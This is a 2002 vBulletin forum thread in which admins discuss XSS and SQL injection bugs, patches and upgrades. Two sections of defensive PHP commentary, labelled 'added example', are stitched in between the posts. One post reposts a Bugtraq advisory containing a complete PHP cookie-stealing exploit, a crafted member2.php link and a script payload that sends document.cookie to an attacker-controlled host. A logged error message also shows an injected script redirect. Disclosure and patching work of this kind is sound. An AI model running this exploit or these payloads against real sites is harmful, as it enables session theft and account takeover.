Thanks all for jumping in here, to try to troubleshoot this. I'm definitely concerned that maybe something's not right. Any other thoughts on why the file sizes don't match just for the global.php file?

Paul
Mon 4th Nov '02, 1:21am
My guess would be that when the global.php file was edited, it was done with windows carriage returns. Uploading it in ASCII probably removes the extra gibberish. ;)

DWZ
Mon 4th Nov '02, 6:13am
Originally posted by mishkan
After I downloaded the global.php file, I was able to open it in MS Notepad, and it looks okay... not gibberish. So, I downloaded it in ASCII, not binary. Right?

Yep, that's right.

Try downloading Araxis Merge (http://www.araxis.com/merge/) (there is a 30-day trial shareware download).

In one window open up the global.php you got from vBulletin, and in the other window open up the global.php you got from your website and see if there are any differences.

Erwin
Mon 4th Nov '02, 7:11am
Originally posted by mishkan
Thanks all for jumping in here, to try to troubleshoot this. I'm definitely concerned that maybe something's not right. Any other thoughts on why the file sizes don't match just for the global.php file?

When I use WSFTP, the file sizes correlate and remain the same. When I use ACEFTP, the file sizes are different (after I upload it. When I download it, it reverts back to the "normal" size). I'm sure there's a simple explanation for this, but either way, the file works. :) I agree with what Loveshack says about carriage returns (though the reversion back to normal when I download makes no sense).

mishkan
Mon 4th Nov '02, 11:33am
LoveShack, that's interesting to know, about Windows putting in special carriage returns.

DWZ, I have Beyond Compare, so I tried what you suggested. I downloaded the global.php file that I had uploaded, before. Then I compared both files. They are exactly alike!

And, Erwin, when I downloaded the global.php file, in order to compare it to the original, it did revert back to the same file size as the original, just like it did for you!

What is so confusing, is that only the global.php file doesn't match the file size on my computer. I just upgraded to 2.2.8, yesterday, and all the other php files match.

You're probably right that there's some simple explanation for this! Before I let this go, how can I test this global.php file, to see if it's working correctly? Thanks again, everyone.

mishkan
Thu 7th Nov '02, 3:38pm
Does anyone know a way I can test my global.php file, to make sure it's working correctly? Simple, sequential steps, please. ;) Thanks in advance.

Steve Machol
Thu 7th Nov '02, 3:51pm
Originally posted by mishkan
Does anyone know a way I can test my global.php file, to make sure it's working correctly? Simple, sequential steps, please. ;) Thanks in advance.

AFAIK the only way to test it is to run through all the various options on your forums. If you don't get any errors related to global.php then you're probably okay.

mishkan
Thu 7th Nov '02, 4:50pm
Steve, thanks. :) What I meant to ask was... how do I test the global.php file, to make sure it's working against this XSS security bug?

In the beginning of this thread, some people were talking about reproducing the security problem on their own boards. It became confusing for me, as some people were successful, some were not, and some were changing the steps this way or that way.

I too would like to test my global.php file and make sure my board is secure. Remember, I have some uncertainty as to whether or not I uploaded correctly, as the file sizes don't match. :(

Would you, or some other generous soul, please sift through this thread and type up the correct steps to reproduce the security bug? Many thanks if you have the time. :)

DWZ
Thu 7th Nov '02, 5:27pm
Originally posted by mishkan
Steve, thanks. :) What I meant to ask was... how do I test the global.php file, to make sure it's working against this XSS security bug?

The info was in the first two pages or so.

If you like, PM me your URL and a test (just normal member) account and I'll test the site against the bug for you.

TheSonic
Sat 23rd Nov '02, 5:26am
I was attacked by such a script.

I am running 2.2.9 and I got mail from vB:


Database error in vBulletin 2.2.9:
Invalid SQL: SELECT thread.threadid
FROM thread,subscribethread
WHERE subscribethread.threadid=thread.threadid
AND subscribethread.userid='29'
AND thread.visible=1 AND lastpost >= 1035446435
ORDER BY lastpost DESC
LIMIT 0,<Script>location='http://<hackerurl>/x.php?Action=Log

mysql error: You have an error in your SQL syntax near '<Script>location='http://<hackerurl>/x.php?Action=Log
' at line 7

mysql error number: 1064



Is this good or bad?
Sorry, I am a little bit scared, so please give me some feedback.

Thank you!

Scott MacVicar
Sat 23rd Nov '02, 10:46am
That was another unpublished one that has been fixed in the latest CVS version.

Paul
Sat 23rd Nov '02, 1:19pm
Does that mean someone has created an exploit that's in the wild for this unpublished problem? If so, perhaps the fix should be shared here.

Paul
Sat 23rd Nov '02, 1:20pm
Originally posted by LoveShack
Does that mean someone has created an exploit that's in the wild for this unpublished problem? If so, perhaps the fix should be shared here.

I spoke too soon. I opened up my e-mail client and saw the post on Bugtraq.

Raz Meister
Sat 23rd Nov '02, 2:18pm
I've posted a quick solution in this thread: http://www.vbulletin.com/forum/showthread.php?postid=375329

TheSonic
Sat 23rd Nov '02, 6:29pm
So, what does this thing do?

Did the "hacker" receive data from my system (so I have to change important passwords), or did nothing happen?

The system works fine, I only got the error one time.

Running 2.2.9 RC

Raz Meister
Sat 23rd Nov '02, 6:32pm
Originally posted by TheSonic
So, what does this thing do?

Did the "hacker" receive data from my system (so I have to change important passwords), or did nothing happen?

The system works fine, I only got the error one time.

Running 2.2.9 RC

There are two known exploits.

One allows someone to use the XSS exploit to steal cookies, and potentially log in as that user.

The other is an SQL injection exploit.

I would patch them both up until the new final version is released.
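An added example, not vBulletin's code and not the fix Raz Meister links to (which this thread does not reproduce): the SQL error TheSonic posted shows the injected value landing in a LIMIT clause, and the generic defence for that is to coerce paging values to bounded integers before the query string is built. Table and column names follow the quoted error message; the inputs are constructed, with the injected one copied from that message and `<hackerurl>` kept as the thread's own placeholder.

```php
<?php
// Added example (not vBulletin's code): bounded-integer paging values so
// that the LIMIT clause is built from integers only. Table and column
// names follow the error message quoted in the thread; inputs are constructed.

// Constructed paging inputs. The 'injected' perpage copies the value from
// the quoted error message; <hackerurl> is the thread's own placeholder.
const SAMPLE_INPUTS = [
    'normal'   => ['start' => '20', 'perpage' => '10'],
    'negative' => ['start' => '-5', 'perpage' => '0'],
    'injected' => ['start' => '0',  'perpage' => "<Script>location='http://<hackerurl>/x.php?Action=Log"],
];

// Clamp an untrusted value to an integer in [$min, $max]. Anything that
// is not a whole number collapses to $min instead of reaching the SQL.
function bounded_int($value, int $min, int $max): int
{
    $n = filter_var($value, FILTER_VALIDATE_INT);
    if ($n === false) {
        return $min;
    }
    return max($min, min($max, $n));
}

// Builds the subscription query from the error message with a LIMIT
// that can only ever contain two integers.
function subscribed_threads_sql(int $userid, $start, $perpage, int $since): string
{
    $start   = bounded_int($start, 0, PHP_INT_MAX);
    $perpage = bounded_int($perpage, 1, 100);
    return 'SELECT thread.threadid FROM thread, subscribethread'
         . ' WHERE subscribethread.threadid = thread.threadid'
         . ' AND subscribethread.userid = ' . $userid
         . ' AND thread.visible = 1 AND lastpost >= ' . $since
         . ' ORDER BY lastpost DESC LIMIT ' . $start . ',' . $perpage;
}

// The query must end in LIMIT <int>,<int>, whatever was passed in.
function limit_is_numeric(string $sql): bool
{
    return preg_match('/ LIMIT \d+,\d+$/', $sql) === 1;
}

// Returns [input name => LIMIT clause is purely numeric]; all true.
function check_all(): array
{
    $out = [];
    foreach (SAMPLE_INPUTS as $name => $in) {
        $sql = subscribed_threads_sql(29, $in['start'], $in['perpage'], 1035446435);
        $out[$name] = limit_is_numeric($sql);
    }
    return $out;
}

foreach (check_all() as $name => $ok) {
    printf("%-9s LIMIT numeric: %s\n", $name, $ok ? 'yes' : 'NO');
}
```

The injected value never reaches the query: FILTER_VALIDATE_INT rejects it and the clamp substitutes the lower bound, so the generated statement ends in `LIMIT 0,1`. Casting is the usual defence for LIMIT values in particular, since not every database driver lets them be bound as parameters; for the other values in a query, a parameterised statement is the general answer.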

Chris M
Sun 24th Nov '02, 10:20am
Originally posted by Raz Meister
There are two known exploits.

One allows someone to use the XSS exploit to steal cookies, and potentially log in as that user.

The other is an SQL injection exploit.

I would patch them both up until the new final version is released.

Cool...

I really do hope this is the last time we see this error;)

Satan

bejita_kg
Sun 24th Nov '02, 10:43am
Originally posted by hellsatan
Cool...

I really do hope this is the last time we see this error;)

Satan

Guys, on Bugtraq a vBulletin hole was reported again?
http://marc.theaimsgroup.com/?l=bugtraq&m=103802065718628&w=2

I disabled the memberlist till a vBulletin developer confirms this.

Raz Meister
Sun 24th Nov '02, 3:13pm
Originally posted by bejita_kg
Guys, on bugtraq vBulletin reported a hole again?
http://marc.theaimsgroup.com/?l=bugtraq&m=103802065718628&w=2

I am disabling the memberlist until the vBulletin developers confirm this.

That is the original XSS vulnerability reported. Not a new one.

NTLDR
Sun 24th Nov '02, 3:45pm
Originally posted by Raz Meister
That is the original XSS vulnerability reported. Not a new one.

Actually, that is a new bug. I've just tested it on my 2.2.9 RC install and I get the popup with the details.

Raz Meister
Sun 24th Nov '02, 3:48pm
Originally posted by NTLDR
Actually, that is a new bug. I've just tested it on my 2.2.9 RC install and I get the popup with the details.

What I meant was that it's already been reported and a fix has been posted.

It's not new, as in it's the 3rd bug.

NTLDR
Sun 24th Nov '02, 4:07pm
Originally posted by Raz Meister
What I meant was that it's already been reported and a fix has been posted.

It's not new, as in it's the 3rd bug.

Sorry, I misunderstood. It works on vB.org, so I suggest that it is fixed there.

Tommy Boy
Sun 24th Nov '02, 4:21pm
It seems to only affect sites with more than one page in the members list, so a fresh installation will probably come out clean. However, I'm not saying this after looking at the code, so it's only my impression and should be verified.

NTLDR
Sun 24th Nov '02, 5:08pm
Originally posted by Tommy Boy
It seems to only affect sites with more than one page

That does seem logical and the case from what I have found out. I saw the link above to the thread where this has been mentioned and will try the patches there :)

Scott MacVicar
Sun 24th Nov '02, 5:21pm
Yes, it only happens on links with more than one page, as that is the only time that it is shown on the page.

These and more will be fixed for 2.2.9 Final.

bejita_kg
Sun 24th Nov '02, 11:24pm
Originally posted by Scott MacVicar
Yes, it only happens on links with more than one page, as that is the only time that it is shown on the page.

These and more will be fixed for 2.2.9 Final.

So for now, preventing anyone from accessing the memberlist is the best solution? When is the final version out?

Paul
Mon 25th Nov '02, 12:16am
Originally posted by bejita_kg
So for now, preventing anyone from accessing the memberlist is the best solution? When is the final version out?

No. Applying the suggested fixes would be the best solution. The developers are looking at all of the vBulletin code and there may be other places where a vulnerability could occur in other files--not just memberlist.php or member2.php. The only ones known publicly are the ones that have been reported here. Anything else is just an additional precaution.

2.2.9 Final, like 3.0 will be released when it's ready. Hopefully not a moment before. :)

Best wishes,
Paul

bejita_kg
Mon 25th Nov '02, 1:05am
Originally posted by LoveShack
No. Applying the suggested fixes would be the best solution. The developers are looking at all of the vBulletin code and there may be other places where a vulnerability could occur in other files--not just memberlist.php or member2.php. The only ones known publicly are the ones that have been reported here. Anything else is just an additional precaution.

2.2.9 Final, like 3.0 will be released when it's ready. Hopefully not a moment before. :)

Best wishes,
Paul

OK, thanks :D
I'm also doing trial and error on my own forum; I'll report it if I find another bug.

TheSonic
Wed 27th Nov '02, 5:37am
Originally posted by LoveShack
2.2.9 Final, like 3.0 will be released when it's ready. Hopefully not a moment before. :)


I don't like to hack my board, and so I hope Jelsoft releases a fix very soon.

In most cases it's OK if they first test the versions for a while (or a long time :D) (that's why vB is such a great stable product, I think).

But now the situation is different, because there are KNOWN *BIG* problems, so I would like to see an official release from Jelsoft - even if it is just a hotfix - to close the holes.

DaTeX
Wed 27th Nov '02, 9:55am
And a new XSS bug
Mail via bugtraq
.:: vBulletin XSS Injection Vulnerability

vBulletin is a powerful and widely used bulletin board system, based on
the PHP language and the MySQL database. I recently discovered a Cross-Site
Scripting issue that would allow attackers to inject maleficent code
into the pages and execute it in the client's browser.

+ Vulnerable Versions:

- Jelsoft vBulletin 2.2.9 Candidate.
- Jelsoft vBulletin 2.2.8.
- Jelsoft vBulletin 2.2.7.
- Jelsoft vBulletin 2.2.6.
- Jelsoft vBulletin 2.2.5.
- Jelsoft vBulletin 2.2.4.
- Jelsoft vBulletin 2.2.3.
- Jelsoft vBulletin 2.2.2.
- Jelsoft vBulletin 2.2.1.
- Jelsoft vBulletin 2.2.0.
- Jelsoft vBulletin 2.0.2.
- Jelsoft vBulletin 2.0.1.
- Jelsoft vBulletin 2.0.0.

+ Details:

In the "Start View Threads" block in member2.php, there is a variable
[$perpage] that controls how subscribed threads are listed; therefore an
integer value [which refers to the number of threads that will be
displayed on each page] should be assigned to the variable. However, we
should realise that the value of this variable is added to a query that
will fetch records from the database, so if a client gives a wrong value
to $perpage, the script will output an error message [because the script
doesn't check and filter its inputs], printing the query and revealing
its mistake.

+ Exploit:

- Run this script on some host:

<?PHP

// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Description: Fetching vBulletin's cookies and storing it into a log file.

// Variables:

$LogFile = "Cookies.Log";

// Functions:

/*

If ($HTTP_GET_VARS['Action'] = "Log") {

$Header = "<!--";
$Footer = "--->";

}
Else {

$Header = "";
$Footer = "";

}

Print ($Header);

*/

Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");

/*

Print ($Footer);

*/

Switch ($HTTP_GET_VARS['Action']) {

Case "Log":

$Data = $HTTP_GET_VARS['Cookie'];

$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));

$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);

Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

Break;

Case "List":

If (!File_Exists ($LogFile) || !In_Array ($Records)) {

Print ("<Br><Br><B>There are No Records</B></Center></Pre>");

Exit ();

}
Else {

Print ("</Center></Pre>");

$Records = Array_UniQue (File ($LogFile));

Print ("<Pre>");

Print ("<B>.:: Statics</B>\n");
Print ("\n");

Print (". Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
Print (". Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");

Print ("<B>.:: Options</B>\n");
Print ("\n");

If (Count (File ($LogFile)) > 0) {

$Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";

}
Else{

$Link['Download'] = "[No Records in Log]";

}

Print (". Download Log : " . $Link['Download'] . "\n");
Print (". Clear Records : [<A Href=\"" . $SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
Print ("\n");

Print ("<B>.:: Records</B>\n");
Print ("\n");

While (List ($Line[0], $Line[1]) = Each ($Records)) {

Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);

}

}

Print ("</Pre>");

Break;

Case "Delete":

@UnLink ($LogFile);

Print ("<Br><Br><B>Deleted Successfully</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");

Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

Break;

}

?>

- Give a victim this link: member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

- Note: You can replace [Script Code] with: --><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>

- Then go to Http://[Exploit Path]?Action=List

+ Solution:

- Under [ // set defaults ] on line 304, paste this code:

if (isset($perpage) && !is_int($perpage)) {

$perpage = intval($perpage);

}

+ Links:

- Http://www.vBulletin.com
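The pattern the advisory describes, as an added example that is neither vBulletin's code nor the advisory author's: a request parameter that should be an integer is interpolated into a SQL LIMIT clause without validation, and the database error page echoes the failing query back unescaped, which is what turns a bad $perpage value into reflected script. The hardened version coerces the value before it can reach the query and HTML-encodes anything echoed back to the browser. The $perpage name and the member2.php subscription listing come from the advisory; the function names, the table and column names, and the 20/100 limits are assumptions.

```php
<?php
// Added example (not vBulletin's code): the $perpage handling described in
// the advisory, shown as the vulnerable pattern and a hardened version.
// $perpage and the subscription listing come from the advisory; function
// names, table/column names and the limits below are assumptions.

// Vulnerable pattern: the raw request value goes straight into SQL and, when
// the query fails, the failing query (still containing the value) is printed
// into the HTML error page, so markup in the value is reflected intact.
function buildSubscriptionQueryVulnerable(array $request): string
{
    $perpage = $request['perpage'] ?? 20;            // no type check at all
    return "SELECT threadid FROM subscribethread WHERE userid = 1 LIMIT 0, $perpage";
}

function renderDbErrorVulnerable(string $query): string
{
    return "<p>Database error: invalid SQL: $query</p>";   // unescaped reflection
}

// Hardened version: accept only a small positive integer, falling back to a
// default otherwise, so nothing attacker-controlled reaches the query text.
function sanitizePerPage($value, int $default = 20, int $max = 100): int
{
    if (!is_string($value) && !is_int($value)) {
        return $default;
    }
    if (!preg_match('/^\d{1,3}$/', (string) $value)) {   // digits only, no sign
        return $default;
    }
    $n = (int) $value;
    return ($n >= 1 && $n <= $max) ? $n : $default;
}

function buildSubscriptionQueryHardened(array $request): string
{
    $perpage = sanitizePerPage($request['perpage'] ?? null);
    return "SELECT threadid FROM subscribethread WHERE userid = 1 LIMIT 0, $perpage";
}

function renderDbErrorHardened(string $query): string
{
    // Even if a query is ever echoed, encode it so any markup in it is inert.
    return '<p>Database error: ' . htmlspecialchars($query, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed request mimicking the shape of the advisory's payload.
$request = ['perpage' => "--><script>alert(document.cookie)</script>"];

echo renderDbErrorVulnerable(buildSubscriptionQueryVulnerable($request)), "\n";
// The <script> element survives unchanged in the page above.

echo renderDbErrorHardened(buildSubscriptionQueryHardened($request)), "\n";
// perpage falls back to 20, and the request value never reaches the output.
```

The two changes are independent and both are worth making: validating $perpage closes the injection into the query, and encoding the error output means a future query that does echo user input still cannot execute script. A generic error page that never prints the SQL at all would be the better production choice, since the query text is useful to an attacker even when it is encoded.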

DWZ
Wed 27th Nov '02, 10:45am
Augh, not another idiot deciding it would be a good idea to inform all the script kiddies how to **** with our forum...

What's the URL to that report? I want to send the guy an email...

Scott MacVicar
Wed 27th Nov '02, 10:46am
Originally posted by DaTeX
And a new XSS bug
Mail via bugtraq

We have been aware of this problem for many days; version 2.2.9 has been released and it has fixed about 4 XSS bugs.

Hellburn
Wed 27th Nov '02, 11:13am
Originally posted by Scott MacVicar
We have been aware of this problem for many days; version 2.2.9 has been released and it has fixed about 4 XSS bugs.

I can only find the Release Candidate in the Members' Area.

Chris M
Wed 27th Nov '02, 5:36pm
Originally posted by Hellburn
I can only find the Release Candidate in the Members' Area.

The Full Release has been released;)

Satan

EvilLS1
Thu 28th Nov '02, 12:50am
Could someone please post a step by step patch to fix all of the files that are fixed in the full release for those of us who prefer not to upgrade or overwrite entire files?

Thanks.

{edit} Never mind. I went through the 2.2.9 files and applied the patches to 2.2.8 myself.